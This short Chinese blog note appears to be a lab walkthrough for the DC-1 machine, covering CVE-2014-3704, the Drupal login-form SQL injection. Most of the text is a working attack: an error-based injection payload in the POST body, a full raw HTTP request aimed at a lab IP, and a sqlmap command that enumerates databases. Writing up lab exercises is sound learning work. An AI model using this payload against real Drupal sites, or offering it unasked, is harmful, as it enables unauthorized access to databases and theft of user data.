DC-1 登录框的SQL注入 CVE-2014-3704
看了很多文章都没有提及到这个漏洞,偶然在其他博主那里看到还有这个漏洞是其他文章都没有提及到的,做个笔记。
使用POST方法,路径是
/?q=node&destination=node
body:
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
报错注入,显示数据库名是 drupaldb
使用sqlmap
new1.txt:
POST /?q=node&destination=node HTTP/1.1
Host: 192.168.10.133
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,*),0)%23]=bob&name[0]=a
python3 .\sqlmap.py -r "C:\Users\zen\Desktop\new1.txt" --dbs --batch